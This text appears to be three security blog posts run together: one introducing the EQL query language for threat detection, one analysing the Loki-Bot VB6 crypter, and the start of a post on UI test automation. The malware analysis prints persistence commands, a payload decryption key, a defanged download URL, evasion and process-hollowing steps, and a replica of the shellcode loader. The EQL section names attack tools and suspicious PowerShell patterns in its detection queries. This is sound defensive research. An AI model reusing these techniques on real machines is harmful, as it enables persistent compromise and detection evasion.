Adversarial activity is no longer described purely in terms of static Indicators of Compromise (IOCs). Focusing solely on IOCs leads to detections which are brittle and ineffective at discovering unknown attacks, because adversaries modify toolkits to easily evade indicator-based detections. Instead, practitioners need durable detections based on malicious behaviors. MITRE’s ATT&CK^TM framework helps practitioners focus their defensive tradecraft on these malicious behaviors. By organizing adversary tradecraft and behaviors into a matrix of tactics and techniques, ATT&CK^TM is ideal to progress detection beyond IOCs and toward behavior-based detection.

With a comprehensive and robust model of adversarial behavior in place, the next step is to build an architecture for event collection that supports hunting and real-time detection, along with a language that promotes usability and performance. We created the Event Query Language (EQL) for hunting and real-time detection, with a simple syntax that helps practitioners express complex queries without a high barrier to entry. I’ll discuss the motivation behind EQL, how it fits into the overall Endgame architecture, and provide several examples of EQL in action to demonstrate its power to drive hunting and real-time detection of adversarial behavior.

Simplifying Complex Queries

Many database and search platforms are cumbersome and unintuitive, with complex syntax and a high barrier to entry. Detecting suspicious behavior requires analysis of multiple data sources and seamless data collection, aggregation, and analysis capabilities. Searching and exploring data should be intuitive and iterative, with the flexibility to fine-tune questions and hone in on suspicious behavior.

Within the Endgame platform, we create functionality to overcome these data analysis and detection challenges. Our goal is to empower users without overwhelming them. That’s why we initially created Artemis, which enables analysts to search using natural English, with intuitive phrases like “Find the process wmic.exe running on active Windows endpoints.” However, analysts also often want to search for things that are difficult to describe clearly and concisely in English. We knew that addressing this next challenge would require a new query language that supports our unique architecture and equips users to find suspicious activity. Our solution, EQL, balances usability while significantly expanding capabilities for both hunting and detection. It can be used to answer complex questions without burdening users with the inner workings of joins, transactions, aggregations, or state management that accompany many database solutions and analysis frameworks. EQL has proven effective, and we’re excited to introduce it to the community to drive real-time detection.

Endgame’s Eventing Architecture

Several architectural decisions in the Endgame platform played a pivotal role in the design and development of EQL. In the age of big data, Endgame takes an efficient and distributed approach to event collection, enrichment, storage, and analysis. Most solutions require data to be forwarded to the cloud to perform analysis, generate alerts, and take action. This introduces a delay for detection, increases network bandwidth utilization, and most importantly, implies that disconnected endpoints are less protected.

With the Endgame platform, live monitoring, collection, and analysis happen where the action happens: on the endpoint. This endpoint-focused architecture allows for rapid search at scale while minimizing bandwidth, cloud storage, and time spent waiting for results. It also enables process and endpoint enrichment, unique forms of stateful analysis—like tracking process lineage—and autonomous decisions without any need for platform or cloud connectivity. When an endpoint detects suspicious behavior, it makes a prevention or detection decision and alerts the platform of suspicious activity with the corresponding events. This decision happens without requiring a round trip to the Endgame management platform or the cloud, assuring that disconnected and connected endpoints are equally protected from suspicious behavior.

These architectural decisions drove the logical next step: structuring a language that optimizes these capabilities. As we developed EQL, we aimed to create a language that is accomodating to users, optimized for our architecture, and shareable for defenders.

Designing a Language

We wanted to ensure EQL supported sophisticated questions within a familiar syntax to limit the learning curve and maximize functionality. EQL provides abstractions that allow a user to perform stateful queries, identify sequences of events, track process ancestry, join across multiple data sources, and perform stacking. In designing EQL, we focused first on exposing the underlying data schema. Every collected event consists of an event type and set of properties. For example, a process event has fields such as the process identifier (PID), name, time, command line, parent information, and a subtype to differentiate creation and termination events. At the most basic level, an event query matches an event type to a condition based on some Boolean logic to compare the fields. The where keyword is used to tie these two together in a query. Conditionals are combined with Boolean operators and, or, and not; comparisons <, <=, ==, !=, >=, >, and in; and function calls. Numbers and strings are expressed easily, and wildcards (*) are supported. All of this leads to a simple syntax that should feel similar to Python.

When searching for a single event, it is easy to express many English questions with EQL in a readable, streamlined syntax. For example, the question:

What unique outgoing IPv4 network destinations were reached by svchost.exe to port 1337 with the IP blocks 192.168.0.0/16 or 172.16.0.0/16?

Is expressed as an EQL:

network where 
  event_subtype_full == "ipv4_connection_attempt_event" and 
  process_name == "svchost.exe" and 
  destination_port == 1337 and
  (destination_address == "192.168.*" or destination_address == "172.16.*")
| unique destination_address destination_port

EQL supports searches for multiple related events that are chained together with a sequence of event queries as well as post-processing similar to unix-pipes |. Defenders can assemble these components to define simple or sophisticated behaviors without needing to understand the lower-level mechanics. These building blocks are assembled to build powerful hunting analytics and real-time detections in the Endgame platform.

Applying EQL

In the Endgame platform, when valid EQL is entered, the query is compiled and sent to the endpoints which then execute the query and return results. This happens quickly and in parallel, allowing users to immediately see results. Let’s take a look at how EQL is expressed in the following scenarios.

IOC Search

IOC searching isn’t hunting, but it is an important piece of many organizations’ daily security operations. Endgame users can express a simple IOC search in EQL:

process where sha256=="551d62be381a429bb594c263fc01e8cc9f80bda97ac3787244ef16e3b0c05589"

Many Endgame users choose to use Artemis’ natural language capabilities for this sort of search by simply asking, "Search processes for 551d62be381a429bb594c263fc01e8cc9f80bda97ac3787244ef16e3b0c05589".

Time Bound Searches

There are many times during incident response in which it is useful to know everything that happened at a specific time on an endpoint. Using a special event type called any, which matches against all events, EQL can match every event within a five minute window.

What events occurred between 12 PM UTC and 12:05 PM UTC on April 1, 2018?

any where timestamp_utc >= "2018-04-01 12:00:0Z" and timestamp_utc <= "2018-04-01 12:05:0Z"

Stacking on the Endpoint

We can filter and process our data as it is searched, without having to pull all the raw results back for stacking, establishing situational awareness, and identifying outlier activity. The language provides data pipes, which are similar to unix pipes, but instead of manipulating lines of input, a data pipe receives a stream of events, performs processing, and outputs another stream of events. Supported pipes enable you to:

Count the number of times something has occurred
```
| count <expr>,<expr>,...	
```
Output events that meet a Boolean condition
```
| filter <condition> 
```
Output the first N events
```
| head <number>
```
Output events in ascending order
```
| sort <expr>, <expr>, ...	
```
Output the last N events
```
| tail <number>
```
Remove duplicates that share properties
```
| unique <expr>,<expr>,...	
```

Which users ran multiple distinct enumeration commands?

join by user_name
    [process where process_name=="whoami.exe"]
    [process where process_name=="hostname.exe"]
    [process where process_name=="tasklist.exe"]
    [process where process_name=="ipconfig.exe"]
    [process where process_name=="net.exe"]
| unique user_name

Which network destinations first occurred after May 1st?

network where event_subtype_full=="ipv4_connection_attempt_event"
| unique destination_address, destination_port
| filter timestamp_utc >= "2018-05-01"

Sequence of Events

Many behaviors aren’t atomic and span multiple events. To define an ordered series of events, most query languages require elaborate joins or transactions, but EQL provides a sequence construct. Every item in the sequence is described with an event query between square brackets [<event query>]. Sequences can optionally be constrained to a timespan with the syntax with maxspan=<duration>, or expire with the syntax until [<event query>], or match values with the by keyword.

What files were created by non-system users, first ran as a non-system process, and later ran as a system-level process within an hour?

sequence with maxspan=1h
  [file where event_subtype_full=="file_create_event" and user_name!="SYSTEM"] by 
file_path
  [process where user_name!="SYSTEM"] by process_path
  [process where user_name=="SYSTEM"] by process_path

Process Ancestry

The language can even express relationships in a process ancestry. This could be used to look for anomalies that may have normal parent-child relationships, but are chained together in a suspicious way. To check if a process has a certain ancestor, the syntax descendant of[<ancestor query>] is used.

Did any descendant processes of Word ever create or modify any executable files in system32?

file where file_path=="C:\\Windows\\System32\\*" and file_name=="*.exe" and descendant of [process where process_name=="WINWORD.exe"]

Process ancestry relationships also support nesting and Boolean logic, facilitating rigorous queries. This helps hone in on specific activity and filter out noise.

Did net.exe run from a PowerShell instance that made network activity and wasn’t a descendant of NoisyService.exe?

process where process_name=="net.exe" and 
  descendant of [network where process_name=="powershell.exe" and
      not descendant of [process where process_name == "NoisyService.exe"]]

Function Calls

Functions can extend EQL capabilities by defining and exposing new functions without having to change any syntax. The length() function is useful for finding suspicious and rare PowerShell command lines, for example:

What are the unique long Powershell command lines with suspicious arguments?

process where process_name in ("powershell.exe", "pwsh.exe") and length(command_line) > 400 and (command_line=="*enc*" or command_line=="*IO.MemoryStream*" or command_line == "*iex*" or command_line=="* -e* *bypass*")
| unique command_line

Sorting with Thresholds

EQL can also be used for performing outlier analysis. The pipes sort and tail filter data on the endpoint so only outliers are returned. With a search constructed this way, there is a well-defined upper bound on how many results are returned by an endpoint. That means there is less bandwidth used, no need for number crunching after the fact, and less time sifting through results. In other words, you don’t have to obtain and store data you don’t need.

What top five outgoing network connections transmitted more than 100MB?

network where total_out_bytes > 100000000
| sort total_out_bytes
| tail 5

Macro Expansion

There is often logic that is shared between various queries. Multiple detections can utilize macros for code reuse and consistency. For instance, a macro could exist that identifies if a file is associated with system or network enumeration:

macro ENUM_COMMAND(name)
    name in ("whoami.exe", "hostname.exe", "ipconfig.exe", "net.exe", ...)

Once defined, macros are used and expanded with the function call syntax. One useful query for hunting may be to find enumeration commands that were spawned from a command shell that is traced back to an unsigned process:

process where ENUM_COMMAND(process_name) and parent_process_name=="cmd.exe"
    and descendant of [process where signature_status=="noSignature"]

Real-Time Detection With EQL

Since historical searches and real-time analytics are both described with EQL, it’s easy to check new protections for noise before deployment. This is crucial because alert fatigue is one of the most common problems faced by the defender today. When creating a new analytic, Endgame researchers use a refinement process to filter out false positives.

When detecting malicious behavior and attacker techniques, the first step is often detonating malware or a malicious script and collecting endpoint data. Once data is collected, events are explored with EQL and a new query is written. To establish a reasonable degree of confidence, we then evaluate the query against many sources of data, including Endgame’s internal network, partner data, and custom environments that are intentionally noisy. After passing these checks, a new tradecraft analytic expressed in EQL is enriched with metadata and converted to a format which Endgame’s detection engine understands. Finally, this machine representation of the query is loaded into the sensor, where new events are analyzed in real-time and an alert is generated immediately when a match is detected.

Writing Behavioral Malware Detections

EQL is not limited by the underlying data. In fact, we use EQL in our malware detonation and analysis sandbox, Arbiter® , which has a different underlying data schema. Expressing behavioral detections of malware with EQL in Arbiter® is painless, and our custom analysis engine performs orders of magnitude faster than other approaches we evaluated, allowing us to rapidly perform dynamic malware analysis and detect new behaviors.

Process Injection Detection in Arbiter

A traditional remote shellcode injection technique uses several well documented Windows APIs to open a handle to a remote process, allocate memory, write to the newly allocated memory, and start a thread. The code generally looks something like:

hVictim = OpenProcess(PROCESS_ALL_ACCESS, 0, victimPid);
lpDestAddress = VirtualAllocEx(hVictim, NULL, numBytes, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hVictim, lpDestAddress, lpSourceAddress, numBytes, NULL);
CreateRemoteThread(hVictim, NULL, 0, lpStart, NULL, NULL, NULL);
CloseHandle(hVictim);

To build an analytic using API events, the process handle needs to be correctly tracked. The handle hVictim is first returned by OpenProcess and then used as an argument in the calls to VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread. However, if and when CloseHandle is called, the handle is invalidated and all state for that handle needs to be thrown away, because it may be reused. It may sound complicated, but a stateful detection for Arbiter® is easy to create with EQL.

sequence
  [api_ret  where function_name=="OpenProcess"] by return_value
  [api_call where function_name=="VirtualAllocEx"] by arguments.hProcess
  [api_call where function_name=="WriteProcessMemory"] by arguments.hProcess
  [api_call where function_name=="CreateRemoteThread"] by arguments.hProcess
until
  [api_call where function_name=="CloseHandle"] by hObject

One sequence is not enough to detect all forms of process injection. There are many methods to gain arbitrary code execution in another process, each with different API calls, and each requiring another detection. Consequently, as the attacker’s playbook continues to evolve, defenders need to react quickly and find new ways to detect the latest techniques while simultaneously promoting layered detections.

Unifying Hunt and Detection

With the Event Query Language, we can describe events that correspond to adversary techniques without dealing with the mechanics of traditional databases, rule engines, or an awkward data schema. Search, hunt, and detect are unified within the Endgame platform by EQL, where exploring events is made easy without sacrificing power and flexibility. Ultimately, EQL helps Endgame and Endgame customers quickly find suspicious activity and improve detections of attacker techniques defined in MITRE’s ATT&CK^TM.

Advancing our collective understanding and adoption of security tools is of utmost importance to combat today’s threats. At Endgame, sharing information about capabilities we’ve built and the underlying architecture which motivated our decisions is one way for us to do that. We look forward to discussions within the security community going forward about EQL and its value in driving advanced hunt and detection in a way that is performant, robust, and most importantly, empowering to defenders.

Last year, researchers identified new crimeware, Loki-Bot, which steals data and login credentials. Loki-Bot is generally distributed through malicious spam, and is difficult to identify without getting into the malware. Loki-Bot crimeware targets Windows, in contrast to the recent Android banking ransomware, Loki Bot. While the crimeware is not as prevalent in the wild, it has some unique and differentiating characteristics

Loki-Bot’s crypter is especially interesting and unique because it utilizes Visual Basic 6.0 to load multiple stages of shellcode to deliver the Loki-Bot payload. We saw an interesting sample highlighted by @DissectMalware on Twitter and decided to take a closer look for ourselves. We’ll walk through Loki-Bot’s crypter functionality, the first and second stage shellcodes, the payload, and then provide some thoughts on stopping these kinds of attacks and what we can expect to see next.

Loki-Bot Crypter Functionality

The main Visual Basic compiled binary uses a raw pointer access technique to jump into the first stage shellcode which then calls the second-stage shellcode that is executed off of the stack. The first stage shellcode disables data execution prevention (DEP) to make the stack executable, and uses jmp esp to jump into the stage 2 shellcode to allow it to begin execution. Stage 2 then sets up persistence, decrypts the payload, and executes the payload contents by using process hollowing. In this case the payload is Loki-Bot, crimeware designed to steal private information from a system. Loki-Bot’s functionality has already been covered in detail elsewhere, so we will instead focus on the mode of compromise and its anti-reversing engineering tactics.

Delivery Context

This particular malware sample began its life as an executable with an RTF exploit. Generally an RTF exploit is a specially crafted file that exploits vulnerabilities in the Rich Text Format parser of an application like Microsoft Word or Adobe Acrobat in order to gain code execution on the victim. The malware can then use this initial code execution to begin its exploit chain. Usually, crafted files are spread as attachments in phishing emails, which was the case in this sample. Once the malware gets code execution on the host it then downloads jazz.exe from the link below.

Source: hxxp://tpreiastephenville.com/jazz.exe

Reference: https://twitter.com/DissectMalware/status/983640543828856832

Sha256: a66f989e58ada2eff729ac2032ff71a159c521e7372373f4a1c1cf13f8ae2f0c

PE Description

The binary was compiled with VB6.0 professional/enterprise and so contains normal x86asm with a dependency on msvbvm60.dll. Stage 1 makes specific use of the visual basic runtime DLL to make dll calls to other libraries.

First Stage Shellcode

The first stage shellcode exists within the VB6 portion of the malware, which we’ll refer to as the crypter. The first stage shellcode exists in the “rentegninger” sub module. The original sub module is then partially overwritten with obfuscated shellcode. The “Remanipulation8” public function is called from Load_Form(). This function manipulates the list of values of the Virtual Function Table returned by the “Me” reference to the form.

Set var_2 = Me

How to Get the Shellcode Entrypoint

Stage 1 overwrites one of the variables in the compiled Visual Basic 6 code to point to an offset in the middle of the “rentegninger” submodule. The pointer is a hard coded integer that is calculated with division and a square root as shown below.

var_17 = 0x1526C77
new_value = var_17 \ CLng(Sqr((25)))
new_value = 0x43AF4B

Utilizing StrPtr to Access Addresses

In the code example below the pointer to the Me value points to the beginning of the Virtual Function Table of the class that Me points to. In this case the Class is a Form. The offset 0x2B0 is actually the function “Show”. The pointer to the show function is overwritten by the entry point of the shellcode which is 0x43AF4B. Then you can easily call “Form.Show” and call into your shellcode. An example of this is located in the Appendix.

var_num1 = StrPtr(var_2) + 2B0h
ReplacePtr(var_num1, new_value)

This value is later called in the “Remanipulation8” function as call dword ptr [eax+2B0h]. It treats this call as a method of the Me object. DispCallFunc .

String-to-Stack Method

The crypter uses a common trick to get the strings that are inline with the assembly onto the stack. When a call is made, the next address gets pushed onto the stack as the return destination address. A disassembler will try to disassemble the string even though it never gets executed.

Using Shell_NotifyIcon

The first stage shellcode uses the Shell_NotifyIcon in a non-standard way. It passes an address off the stack that does not resemble a proper PNOTIFYICONDATA struct. The Windows API still processes the events as if they were normal. As you can see below, the Shell_TrayWnd icon is junk data for this process. It is called twice where NIM_ADD and NIM_DELETE are used.

Utilizing the PEB Loader and DllFunctionCall

The first stage shellcode uses a common technique among other Windows shellcode to get a reference to DllFunctionCall by utilizing the Process Environment Block (PEB). The PEB is a data structure provided to every running process, and can be used to gain information about that process such as environment variables, image base addresses and DLL imports. This shellcode contains a PEB loader routine that gets a reference to msvbvm60.dll and then finds the offset of DllFunctionCall at 0x8D560CEC. Once it has the correct offset to DllFunctionCall, it can then use it to load Windows APIs so that it can make calls to them. More information on the PEB can be found here.

In a nutshell, the PEB is a linked list of offset values and the string names of the desired functions. You can linearly traverse the linked list, check for the desired function and save its offset if found.

Disabling Data Execution Prevention (DEP)

The function ZwSetInformationProcess can be called with parameters -1 and 0x22 to turn off DEP for the process. DEP was originally intended to prevent programs from executing code on the stack, however DEP can also cause normal programs to crash without any notifications. Giving the program the ability to turn off DEP for itself allows the malware to avoid unknown crashes while also allowing malware authors to execute shellcode explicitly on the Stack. Microsoft Support provides additional details about DEP.

Decoding the Shellcode

The stage 1 shellcode then utilizes JMP ESP to jump into that stack at the offset where the buffer for stage 2 shellcode was allocated. The stage 2 shellcode that was initially loaded onto the stack undergoes an initial pass of XOR decoding with an immediate value of 0x510473D1.

Second Stage Shellcode

Sandbox Evasion

The stage 1 shellcode executes CPUID to detect if it’s being run in a virtual environment. If it is running in a virtual environment, it exits. If the stage 1 shellcode is not running in a virtual environment, then it continues execution normally. As detailed elsewhere, the malware sets the EAX register to 1, calls CPUID and then checks the 31st bit of the ECX register by applying a bitmask. If the 31st bit is 0 it knows it’s being run in a virtual environment.

Subsequently, the stage 1 shellcode calls the sleep function. Sleeping for prolonged durations of time is one evasion technique used by malware to subvert detection in sandboxed environments which are usually constrained by resource allocation to not run any given sample for longer than some established period of time, such as 30 seconds. Thus for the first 30 seconds of the program’s lifetime, it is benign and might fool some sandboxing environments.

Anti-Debugging using NtYieldExecution

The ntdll function NtYieldExecution or its kernel32 equivalent SwitchToThread function allows the current thread to allocate the rest of the execution time, and allows the next scheduled thread to execute. If no threads are scheduled to execute or when the system is busy (and will not allow such a switch to occur), the ntdll NtYieldExecution() function returns a STATUS_NO_YIELD_PERFORMED (0x40000024) status code, which causes the kernel32 SwitchToThread function to return zero. When an application is being debugged, the act of single-stepping through the code causes debug events to occur and often results in no yield being allowed to occur. However, this is a hopelessly unreliable method of detecting the presence of a debugger because this method will also detect the presence of a thread that is running with high priority. An example of this code can be found here.

for (int i = 0; i < 0x20; i++)
{
	Sleep(0xf);
	if (NtYieldExecution() != STATUS_NO_YIELD_PERFORMED)
	iDebugged++;
}

Check for Adapters and Windows

The stage 2 shellcode calls VirtualAllocEX to populate a new memory region with GetAdaptersInfo. It checks the offset +10Ch of the struct for the Description. It then calls EnumWindows to check if the window has an empty string, most likely an attempt to detect execution within some sandbox.

Persistence and Process Hollowing

The stage 2 shellcode takes two routes. During the first route, the shellcode sets up persistent mechanisms with schtasks.exe. It then decrypts the payload with Xor and RC4 during the second route, creating a suspended process of itself and then hollows it out with the payload’s contents. Each route is explained below.

Route 1 (Persistence)

The stage 2 shellcode’s first route will acquire the hardcoded strings APPDATA=, TEMP=, and copied.exe in order to place a copy of itself in the %APPDATA% and %TEMP% locations as %AppData%\\Roaming\\copied.exe. Once the path is acquired, it will create a scheduled task to copy and run copied.exe using ShellExecuteA.

schtasks.exe" /Create /SC MINUTE /TN "Startup Key" /TR "%AppData%\\Roaming\\copied.exe"
schtasks.exe "/run /tn \"Startup Key\""

If that fails it will try again by adding "\" /RU SYSTEM"

schtasks.exe" /Create /SC MINUTE /TN "Startup Key" /TR "%AppData%\\Roaming\\copied.exe" /RU SYSTEM

It will also set the registry startup run key with:

schtasks.exe /Create /SC HOURLY /MO 12 /TN \"Startup Key\" /TR \"reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"\\\"\"Startup Key\"\\\"\" /f /t REG_SZ /d \"\\\"\""

Route 2 (Process Hollowing)

The stage 2 shellcode’s second route focuses on decrypting the executable payload into memory and then hollowing out a child process to execute the payload. “Wee2" is the marker on the stack in the shellcode and in the file that denotes the beginning of the copy operation. The format is Wee2<length of payload><key>.

Decrypting the Payload with Key

The key is stored in the shellcode after the marker and size in the shellcode. Its length is 0x100h, and is shown below.

00000000: 9944 4203 c046 b4f2 38dd 33ed 0281 473a  .DB..F..8.3...G:
00000010: 1c76 67d8 43bc d9c6 000f 58c2 c9f7 280e  .vg.C.....X...(.
00000020: 9fec 49ac 0bef bb56 8386 7d96 4c2a 4de3  ..I....V..}.L*M.
00000030: 221f 6e80 8e65 e02b 06b8 5f6a cf5c 72b7  ".n..e.+.._j.\r.
00000040: ea51 9354 1197 05ff 892e 843e 53d2 548b  .Q.T.......>S.T.
00000050: 6dc7 b829 940d e6d3 0d60 a913 d604 795f  m..).....`....y_
00000060: f0f9 9afd 183f 0ca7 d4d7 cee7 597b 9e34  .....?......Y{.4
00000070: 7370 bfd1 dfb6 317c 5709 b0bb 20ad c308  sp....1|W... ...
00000080: f7a2 e461 62e8 1250 da3b d54b a423 a5dc  ...ab..P.;.K.#..
00000090: be18 c536 e51a 3724 5eb1 fa20 2755 cab0  ...6..7$^.. 'U..
000000a0: 414a eb0a 6990 5df8 e1e4 dbf4 aacc ef41  AJ..i.]........A
000000b0: c4c1 10de ecc3 3ecd 645a 01c8 2dfe d015  ......>.dZ..-...
000000c0: 48f3 f1b2 b339 63a1 2b8c 269c f530 f6e9  H....9c.+.&..0..
000000d0: cb25 1687 366b 8875 af02 0771 78a6 1bbd  .%..6k.u...qx...
000000e0: 4e9b 3c5b bae1 ae49 3235 2c45 fbd9 fc92  N.<[...I25,E....
000000f0: 15ce 1d2f 3d14 8f1e b567 5219 7e4f 2166  .../=....gR.~O!f

The stage 2 shellcode uses the 0x100 sized byte key to xor the Loki-Bot payload of 0x34801 size then uses the same key to RC4 decrypt the product of the xor operation.

The shellcode then calls CreateProcessW to create a process of itself in suspended mode. It uses NTCreateFile, NTWriteVirtualMemory, NTUnMapViewofSection for process hollowing on the newly created process which contains the Loki-Bot payload. NtGetContextThread and NtSetContextThread and NtSetContextThread resume the process. The parent process terminates allowing the child to run as an orphan process. Because the Loki-Bot payload has already been reviewed by many researchers, we did not post the details about this malware.

Conclusion

There are a few key aspects to this crypter and its behaviour that make it fishy, including its crafty implementation of the VB6 runtime in shellcode, and use of anti-reverse engineering techniques and process hollowing. First, VB6 and the VB6 run time are rather old. While there are numerous binary distributions of software in the wild that were built with VB6 enterprise, it is still suspicious. Other suspicious activities include disabling its own DEP and checking if it’s being virtualized. Lastly, the crypter makes calls to the Windows API with malformed structs (i.e. the lack of an image for Shell_NotifyIcon). The combination of all of these suspicious activities could signal to a sensor like Endgame MalwareScore^TM that the program is up to no good, allowing us to stop it before the final execution occurs.

As for the future, we are likely to see more samples using legacy run times and features. Judging from this sample, a performant Visual Basic 6 crypter has recently been distributed in the wild. It seems natural that in the future its capabilities will improve and the volume of distribution will increase with continued black market adoption.

Appendix: Stage 1 Code Replication

After careful analysis, we were able to reproduce the method of Stage 1 shellcode execution in VB6. The code below will only display an empty message box.

VB6 Code

Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" _
    (ByRef lpvDest As Any, _
     ByRef lpvSrc As Any, _
     ByVal cbLength As Long)

Private Sub Form_Load()
    Me.Hide
    Dim lngRc As Long
    CopyMemory lngRc, Me, 4
    CopyMemory lngRc, ByVal lngRc, 4
    CopyMemory ByVal (lngRc + 688), 4202169, 4
    Me.Show
End Sub

Shellcode

E9 88 00 00 00 59 E9 8E 00 00 00 5A E8 0C 00 00 00 50 6A 00 6A 00 6A 00 6A 00 
FF D0 C3 64 A1 30 00 00 00 8B 40 0C 8B 40 14 8B 00 8B 58 28 BE 4C 00 53 00 46 
39 33 75 F1 81 7B 04 56 00 42 00 8B 70 10 56 8B 5E 3C 36 8B 34 24 01 DE 8B 5E
78 36 8B 04 24 01 D8 89 C6 83 C6 28 AD 85 C0 74 FB 03 04 24 BB 55 8B EC 83 39 
18 75 EF 81 78 04 EC 0C 56 8D 75 E6 5B 31 DB 53 53 53 54 6A 00 81 04 24 00 00 
04 00 52 51 54 FF D0 83 C4 1C C3 E8 73 FF FF FF 75 73 65 72 33 32 00 E8 6D FF 
FF FF 4D 65 73 73 61 67 65 42 6F 78 41 00

Assembly

[SECTION .text]
global Start
Start:
    jmp     getdll
nextstring:
    pop ecx
    jmp     getstring
getapi:
    pop     edx ;put string in ebx 
    call    loadapi
    push    eax ;get MessageBoxA
    push    0
    push    0
    push    0
    push    0
    call    eax
    retn
loadapi:
    mov     eax, [fs:0x30] ;Get the address of PEB
    mov     eax, [eax+0x0C] ;Get the address of PEB_LDR_DATA
    mov     eax, [eax+0x14] ;Get InMemoryOrderModuleList
loop1:
    mov     eax, [eax]
    mov     ebx, [eax+0x28]
    mov     esi, 0x53004C ;L S
    inc     esi ;M S for MSVBVM60.DLL
    cmp     [ebx], esi
    jnz     loop1
    cmp     dword [ebx+0x4], 0x420056 ;V B for MSVBVM60.DLL
    mov     esi, [eax+0x10]
    push    esi
    mov     ebx, [esi+0x3C]
    mov     esi, [ss:esp] ;<msvbvm60.Ordinal958>
    add     esi, ebx
    mov     ebx, [esi+0x78]
    mov     eax, [ss:esp] ;<msvbvm60.Ordinal958>
    add     eax, ebx
    mov     esi, eax
    add     esi, 0x28
loop2:
	lodsd
	test    eax, eax
	jz      short loop2
	add     eax, [esp]
	mov     ebx, 0x83EC8B55
	cmp     dword [eax], ebx
	jnz     short loop2
	cmp     dword [eax+0x4], 0x8D560CEC ;DllFunctionCall
	jnz     short loop2
	pop     ebx
	xor     ebx, ebx
	push    ebx
	push    ebx
	push    ebx
	push    esp
	push    0
	add     dword [esp], 0x40000
	push    edx ;MessageBoxA
	push    ecx ;user32
	push    esp
	call    eax ;DllFunctionCall
	add     esp, 0x1C
	retn
getdll:
    call nextstring
	db 0x75 ;u
	db 0x73 ;s
	db 0x65 ;e
	db 0x72 ;r
	db 0x33 ;3
	db 0x32 ;2
	db 0x00
getstring:
    call getapi
	db 0x4D ;M
	db 0x65 ;e
	db 0x73 ;s
	db 0x73 ;s
	db 0x61 ;a
	db 0x67 ;g
	db 0x65 ;e
	db 0x42 ;B
	db 0x6F ;o
	db 0x78 ;x
	db 0x41 ;A
	db 0x00

When I recently joined Endgame as an intern on the Quality Assurance (QA) team, I was tasked to build a reliable and scalable automated UI testing framework that integrates with our manual testing process. QA automation frameworks of front end code are fraught with challenges. They have to handle frequent updates to the UI, and have a heavy reliance upon all downstream systems working in sync. We also had to handle additional common issues with the browser automation tool “baked in” to our current framework, and overcome any brittleness in the application wherein minor changes could potentially lead to system failure.

Building an automated UI testing framework required extensive research and collaboration. I sought out experienced guidance to determine project approach, conducted comprehensive research to cast a wide net, participated in thoughtful collaboration to determine framework requirements, and applied structured implementation to grade framework performance.

Ultimately, I built three versions, duplicated a set of tests across all three and baked into each a different browser automation tool. The version of the framework with the non-Selenium based tool baked into it was the most performant. This blog post discusses the journey to building our automated UI testing framework, including lessons learned for others embarking on similar paths.

Automated UI Testing Frameworks: What They Are & Why They Matter

In simple terms, a software framework is a set of libraries and tools that allows the user to extend functionality without having to write everything from scratch. It provides users with a “shortcut” to developing an application. Essentially, our automated UI testing framework would contain commands to automate the browser, assertion libraries, and the structure necessary to write UI tests quickly for current and new UI features.

Easier said than done! Automated UI testing, from the point of view of Front End and QA engineers, is notoriously problematic. Unlike other parts of an application, the UI is perhaps the most frequently developed. In an ideal world, we want our automated tests to reflect the chart results below:

Time and Cost Comparison for UI vs. Automated Testing

The chart represents how over time the cost of manual testing increases. With automated tests, there is expense involved in building, integrating, and maintaining the framework, but a well-built automation framework should remain stable even as an application scales.

Of course, there is no substitute for manually testing certain features of the UI. Our goal was not to replace all of our manual tests with automated ones. It is difficult to automate tests that would simulate how a user might experience layout, positioning, and UI rendering in different browsers and screen sizes. In some cases, visually testing UI features is the only way to test with accuracy. Instead, we wanted to increase the efficiency of our UI tests by adding an automation framework that would run stably, consistently, with minimal maintenance, and therefore minimal cost.

Testing Strategy

It takes an experienced understanding of software testing and QA to know how to achieve the right balance of manual, UI, integration (API) and unit tests. The testing diamond shown below represents part of our approach to raising our UI testing efficiency. Notice that the number of UI tests is significantly smaller than integration tests.

Testing Diamond

In the early days of web development, an application’s UI was responsible for handling business logic and application functionality in addition to rendering the display. For example, the front end of an application would house SQL queries that would pull data from a database, do the work to format it and then hand it to the UI to render.

Today, most browser-based applications have isolated their business logic to a middle tier of microservices and/or code modules that do that heavy lifting. That all being said, the Endgame QA Team has modeled its testing frameworks in a similar tiered manner. The bulk of the functional testing lives in our middle-tier test framework (written in Python) and exercises each and every API endpoint. Our UI testing framework, no longer burdened with verifying application functionality, can now focus on the UI specifically.

With the bulk of the functional tests being pushed down to different testing frameworks, the scope of the UI test framework shrank significantly. We further reduced the scope by removing the look and feel of the frontend from this testing framework. Is this button centered relative to that box? Is the text overrunning the page? Is the coloring here matching the coloring there? UI test cases can certainly test those things, but at what cost? Spinning up a browser (even a headless one), logging in and navigating to a page costs time. We have a seven-person manual feature regression testing team that interacts with the application every day and can spot such things more efficiently than any test case.

So, what will this UI testing framework test then? We decided to keep it focused on high level UI functionality that would prove that the major pages and page components were rendering and that the application was worthy of the next tier of testing. We would verify that:

The user could log in through our application’s interface.
The user could navigate to all of the base pages.
The user could view components that displayed important data on each of the base pages.
The user could navigate to sub pages inside any base pages.

Smoke tests check that the most important features of the application work and determine if the build is stable enough to continue with further testing. This approach relieves brittleness because this set of UI tests does not rely on all downstream systems working in sync. There are fewer tests to maintain and since the tests are fairly straightforward, maintenance is manageable. With our test strategy in hand, we began the search for a browser automation tool.

Eliciting Requirements

Collaboration played an important role in identifying the parameters and requirements to guide the design and build of our automated UI testing framework. Our abandoned, non-functional UI framework code served as my primary reference. I first met with its author to discuss pain points and to find out what else was needed to optimize our UI testing. I also regularly attended Front End stand up meetings to share my progress and field questions. Through these discussions it became clear that the end-to-end approach and challenges around how Selenium worked were the major pain points. Now that I had an overall idea of the desired framework and the type of browser automation tool we needed, I began researching frameworks. I cast a wide net to select the top three most highly performant browser automation tools in the industry. I ultimately chose: NightwatchJS, Cypress, and WebdriverIO.

NightwatchJS, is a popular browser automation tool that wraps Selenium and its Webdriver API with its own commands. NightwatchJS includes several favorable capabilities, including auto managing Selenium sessions, shorter syntax, and support for headless testing. NightwatchJS was also recommended by several colleagues and was an obvious starting point.

In selecting the second tool, I researched current advances in UI testing by tapping into my networks. I pinged front end developers and QA engineers on various Slack channels. Many of them advised against Selenium due to difficulties managing browser specific drivers, and setting up and tearing down Selenium servers. Engineers in my networks recommended a new browser automation tool, Cypress, built completely on JavaScript using its own browser automation, not Selenium. Cypress was gaining buzz as an all in one, JavaScript browser automation tool.

